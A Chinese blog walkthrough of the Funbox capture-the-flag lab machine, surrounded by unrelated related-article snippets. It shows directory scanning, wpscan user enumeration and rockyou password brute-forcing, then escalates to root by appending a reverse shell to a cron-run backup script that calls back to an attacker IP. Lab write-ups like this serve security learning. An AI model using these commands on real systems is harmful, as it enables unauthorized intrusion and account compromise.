Funbox靶机

最新推荐文章于 2024-07-31 00:00:00 发布
最新推荐文章于 2024-07-31 00:00:00 发布
阅读量352 收藏 9
点赞数 10
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huachengyi/article/details/135100868
版权

扫描存活主机IP

IP端口扫描

 

访问80端口

发现进不去 需要修改一下hosts


```
vim /etc/hosts
```

扫描目录

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  -x html,zip,bak,txt,php -u http://10.4.7.148

访问 http://funbox.fritz.box/robots.txt

发现一个目录

访问 http://10.4.7.148/secret/

使用wpscan扫描网站获取账号密码

wpscan --url http://funbox.fritz.box/ -e

使用wpscan枚举密码

wpscan --url http://funbox.fritz.box/ -U admin,joe --passwords /usr/share/wordlists/rockyou.txt

连接ssh

提权

进入funny 文件夹 发现 .backup.sh .reminder.sh

查看两个文件 发现是一个 .backup.sh 是一个定时执行文件

那就写入shell反弹 然后kali监听

echo "bash -i >/dev/tcp/10.4.7.182/8888 0>&1" >> .backup.sh

在经过四次监听之后 终于是拿到了root权限 并找到flag

GoodideaHa
关注
  • 10
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
靶机Funbox: Scriptkiddie
weixin_50339323的博客
09-14 406
一、信息收集 1. 获取靶机IP (在靶机IP过程中不到IP,更改下靶机的配置文件) 2. 描端口 nmap -sC -sV 192.168.8.144 3. 进入web页面 4. 目录 发现网站是wordpress搭建的 二、漏洞利用&提权 1. 用wpscan描 1)枚举用户名 wpscan --url http://192.168.8.144/ --enunerate u 用户名有admin 2)爆破密码 wpscan ...
ifunbox setup v4.4 资源管理神器
04-11
《ifunbox setup v4.4:iOS设备资源管理利器详解》 在移动设备的世界里,尤其是对于苹果的iPhone和iOS设备用户来说,管理和编辑设备上的文件并不像在电脑上那样直观简便。这时,一款强大的资源管理工具就显得尤为...
iFunBox显示机器未越狱
FScyj1的博客
10-29 3819
Theos有一个bug,它无法生成一个有效的libsubstrate.dylib文件,需要手动操作。解决方法是在Cydia里搜索安装CydiaSubstrate,然后将/Library/Frameworks/CydiaSubstrate.framework/CydiaSubstrate拷贝到OSX中,命名为libsubstrate.dylib后放到 "/opt/theos/lib/libsubst
ifunbox_如何使用iFunBox作为强大的iTunes替代产品
culingluan4376的博客
09-17 885
ifunboxIf you love your iOS device but you’re not a fan of iTunes, there’s a way to manage your device without it. Read on as we show you how to spend less time syncing files and dinking around with i...
如何使用iFunbox读取下载app的包名bundle ID
tanglimei6313的专栏
12-22 1570
今天想做个小项目,需要读取项目的bundle ID,请教了逯大师后,想到了用iFunbox。 1.首先,连接设备,打开iFunbox。 2.点击用户应用程序: 这里显示了所有已下载的应用程序。点击你想获取的应用程序的icon 3.双击应用程序,进入其详细界面,此处以天猫为例 4.以列表的形式显示出文件的内容,找到以app结尾的东西,就是我们要找的内容文件 5.将此a
ifunbox连接不上的解决办法
nothing的专栏
06-08 1万+
转自:http://www.pc141.com/html/20130313475-1.html ifunbox中文版下载:http://pan.baidu.com/share/link?shareid=300306&uk=35777119 ifunbox官方下载:http://pan.baidu.com/share/link?shareid=273960&uk=1815394234&fid
iOS开发人员必备App开发工具 ifunbox 支持iPhone, iPad和iPod Touch的文件及应用管理神器 使用实例
Software Architect
03-22 4043
本文仅作为ios开发人员在开发app时对于存储在开发机上的app各种资源分析使用。 比如查看某款App从数据和资源层面分析一下具体应用了哪些资源,本地存储用了什么存储:如数据库是sqlite3,plist,json文件还是coreData及一般哪些信息都会使用什么方式存储比较好等,还有就是这些资源存储标准,规格一般是什么. 目的,是通过ifunbox使用使开发人员对我们的移动终端上的app具体
ifunbox谁用谁知道
yxgyh的专栏
07-27 140
IPHONE 最好用的文件传输工具中文版滴,很好用滴
【技巧】用iFunBox将照片传到相机胶卷中
youduanxinle的专栏
04-22 1875
用iTunes同步的照片会在iOS设备上的相簿生成“照片图库”和同文件名的图库,另外生成的照片图库下的照片只能查看编辑不能够删除。想必大家一定很厌恶,那就学学这个办法给你的iOS设备导入照片到相机胶卷!       首先你需要准备: 1.需导入的图片 2.iFunBox 3.请先看完全篇文章再操作   提供目前最新版的iFunB
iOS-查看真机沙盒文件(利用Xocde)+模拟器查看沙盒文件
热门推荐
极客学伟的技术分享社区
06-14 1万+
iOS在开发过程中一般使用真机进行测试,真机查看沙盒尝试了iTools 和 ifunbox都在iOS升级到9.0以后失去效果.在网络上搜寻到一篇通过Xcode查看真机沙盒文件的方式->在iOS开发之沙盒机制(SandBox),我们了解到如何查看模拟器的沙盒内容。直接在Finder->前往->前往文件夹里输入:/Users/ligang/Library/Application Support/iPho
风车签名管理 for Mac版 - 让签名后的APP可以完全管控和实时监测
群鸿
05-20 532
这是一款在Mac平台上针对内测签名应用的管理软件,旨在对签名后的应用能够控制管理,包括应用的开启或禁用、设置到期时间、 注入或移除第三方动态库文件、设置安装限量、 修改应用名称、版本号和自定义Bundle ID等刚需功能,同时支持个人、公司和企业证书签名, 最重要的是软件在签名时无需填写证书密码,一切操作均在本地Mac电脑中, 确保证书安全,本软件仅限专业工作人员内部应用测试管理,严禁用于非法用途。
iFunBox.exe
07-02
iFunBox.exe
ifunbox_setup
11-04
ifunbox_setup,最好用的IOS小工具。可以完成大部分的ITUNES功能。
iFunBox.rar
03-01
iFunBox是一款专为苹果设备设计的文件管理工具,它为用户提供了类似于Windows资源管理器的界面,使得在iPhone、iPad、iPod touch等设备上浏览、管理文件和目录变得直观且简便。这款软件的核心功能和特点包括: 1. *...
ifunbox.zip
05-13
标题中的"ifunbox.zip"指的是一个包含了ifunbox软件的Windows版本的压缩包文件,这个工具主要用于苹果设备,特别是iPad 4,无需进行越狱操作就能实现音乐、照片和视频的导入与导出。 ifunbox是一款强大的iOS设备...
Linux网络工具“瑞士军刀“集合
分享不一样的技术,与你一起共同成长!
07-26 379
下面结合之前的一些使用经验为大家介绍一下一些经典应用场景下,这个网络命令工具如何使用的。例如怎么查看当前服务器监听哪些端口、连接目标主机端口情况如何?平常我们在进行Linux服务器相关运维的时候,总会遇到一些网络相关的问题。我们可以借助这些小巧、功能强悍的工具帮助我们排查问题、解决问题...
计算机网络—电路、分组、报文交换—图文详解
最新发布
喻师傅的学习笔记
07-31 436
计算机网络—三种交换方式图文详解
第三周:网络应用(上)
Vincent_Zhang233的博客
07-26 252
一、网络应用(层)内容概述我们已经知道,Internet的体系结构是符合TCP/IP协议栈的,而“应用层”就在这个协议的最上层。
网络安全在2024好入行吗?
2401_84466225的博客
07-29 559
024年的今天,慎重进入网安行业吧,目前来说信息安全方向的就业对于学历的容忍度比软件开发要大得多,还有很多高中被挖过来的大佬。
替换itools 的软件
08-09
2. iFunBox:iFunBox是一款免费的应用程序和文件管理工具,可以在Windows和Mac操作系统上使用。它可以让用户在设备和电脑之间轻松传输文件、安装应用程序、管理音乐、照片和视频等。iFunBox界面直观,操作简单,适合...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值